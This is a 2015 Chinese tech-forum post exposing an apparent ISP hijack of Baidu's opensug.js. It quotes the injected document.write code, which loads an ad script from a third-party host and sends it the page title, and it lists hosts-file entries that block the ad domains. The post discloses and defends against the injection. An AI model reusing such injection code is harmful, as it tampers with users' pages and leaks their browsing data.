设为首页收藏本站

ZMX - IT技术交流论坛 - 无限Perfect,追求梦想 - itzmx.com

 找回密码
 注册论坛

QQ登录

只需一步,快速开始

新浪微博账号登陆

只需一步,快速开始

用百度帐号登录

只需两步,快速登录

搜索
查看: 9250|回复: 1

证据曝光广西电信 强制弹窗代码 如何实现JS广告的?劫持百度搜索opensug.js 黑心电信

[复制链接]
 成长值: 333

签到天数: 4736 天

[LV.Master]伴坛终老

发表于 2015/6/27 15:53 | 显示全部楼层 |阅读模式 |Google Chrome 43.0.2357.130|Windows 8.1
天涯海角搜一下: 百度 谷歌 360 搜狗 有道 雅虎 必应 即刻
插入了一个js,然后文件名是正常的opensug.js            其内容为document.write("<script language='javascript' src='http://att.itzmx.com/1/opensug.js?_vv=20080808'></script>");document.write("<script language='javascript' src='http://p.ywbmh.com:7777/pt/pt.php?src=p0007&t="+encodeURIComponent(document.title)+"&ci=3029101464'></script>");
,原来本身的js重命名了opensug.js?_vv=20080808

证据曝光,这段代码被植入网站并不是服务器漏洞等问题,是运营商搞的鬼。

C:\Windows\system32\drivers\etc
建议在hosts下加入如下,均为电信公司的广告弹窗域名
127.0.0.1 p.ywbmh.com
127.0.0.1 p.ubt123.com

127.0.0.1 p.haolew.com 2015年9月11日新增

问:你说我把opensug.js文件名改了,还会被电信劫持么?

答:并不会解决的,没救,看到了劫持其他js了
QQ图片20150627181909.png

欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复

使用道具 举报

戏刚开始 该用户已被删除
发表于 2015/6/27 15:53 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
欢迎光临IT技术交流论坛:http://bbs.itzmx.com/
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册论坛 新浪微博账号登陆用百度帐号登录

本版积分规则

手机版|Archiver|Mail me|网站地图|IT技术交流论坛 ( 闽ICP备13013206号-7 )

GMT+8, 2024/12/22 14:49 , Processed in 0.150909 second(s), 28 queries , MemCache On.

Powered by itzmx! X3.4

© 2011- sakura

快速回复 返回顶部 返回列表